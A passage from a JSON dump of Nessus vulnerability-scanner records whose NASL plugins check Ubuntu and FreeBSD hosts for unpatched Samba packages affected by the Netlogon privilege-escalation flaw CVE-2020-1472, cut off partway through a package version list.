\"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba410<4.10.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba411<4.11.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba412<4.12.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:50", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4559-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-02T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS : Samba update (USN-4559-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:ctdb", "p-cpe:/a:canonical:ubuntu_linux:libnss-winbind", "p-cpe:/a:canonical:ubuntu_linux:libpam-winbind", "p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient0", "p-cpe:/a:canonical:ubuntu_linux:python-samba", "p-cpe:/a:canonical:ubuntu_linux:python3-samba", "p-cpe:/a:canonical:ubuntu_linux:registry-tools", "p-cpe:/a:canonical:ubuntu_linux:samba", "p-cpe:/a:canonical:ubuntu_linux:samba-common", "p-cpe:/a:canonical:ubuntu_linux:samba-common-bin", "p-cpe:/a:canonical:ubuntu_linux:samba-dev", "p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules", "p-cpe:/a:canonical:ubuntu_linux:samba-libs", "p-cpe:/a:canonical:ubuntu_linux:samba-testsuite", "p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules", "p-cpe:/a:canonical:ubuntu_linux:smbclient", "p-cpe:/a:canonical:ubuntu_linux:winbind"], "id": "UBUNTU_USN-4559-1.NASL", "href": "https://www.tenable.com/plugins/nessus/141112", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4559-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141112);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"USN\", value:\"4559-1\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS : Samba update (USN-4559-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS host has packages installed that are affected by a vulnerability as\nreferenced in the USN-4559-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4559-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnss-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:registry-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:smbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:winbind\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|20\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04 / 20.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'ctdb', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'python-samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-common', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'smbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '16.04', 'pkgname': 'winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.31'},\n {'osver': '18.04', 'pkgname': 'ctdb', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'python-samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-common', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'smbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '18.04', 'pkgname': 'winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.20'},\n {'osver': '20.04', 'pkgname': 'ctdb', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'python3-samba', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-common', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'smbclient', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'},\n {'osver': '20.04', 'pkgname': 'winbind', 'pkgver': '2:4.11.6+dfsg-0ubuntu1.5'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ctdb / libnss-winbind / libpam-winbind / libparse-pidl-perl / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:27", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4510-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-09-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Samba vulnerability (USN-4510-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:ctdb", "p-cpe:/a:canonical:ubuntu_linux:libnss-winbind", "p-cpe:/a:canonical:ubuntu_linux:libpam-winbind", "p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient0", "p-cpe:/a:canonical:ubuntu_linux:python-samba", "p-cpe:/a:canonical:ubuntu_linux:registry-tools", "p-cpe:/a:canonical:ubuntu_linux:samba", "p-cpe:/a:canonical:ubuntu_linux:samba-common", "p-cpe:/a:canonical:ubuntu_linux:samba-common-bin", "p-cpe:/a:canonical:ubuntu_linux:samba-dev", "p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules", "p-cpe:/a:canonical:ubuntu_linux:samba-libs", "p-cpe:/a:canonical:ubuntu_linux:samba-testsuite", "p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules", "p-cpe:/a:canonical:ubuntu_linux:smbclient", "p-cpe:/a:canonical:ubuntu_linux:winbind"], "id": "UBUNTU_USN-4510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140640", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4510-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140640);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"USN\", value:\"4510-1\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Samba vulnerability (USN-4510-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced\nin the USN-4510-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4510-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnss-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:registry-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-common-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:smbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:winbind\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'ctdb', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'python-samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-common', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-common-bin', 'pkgver': 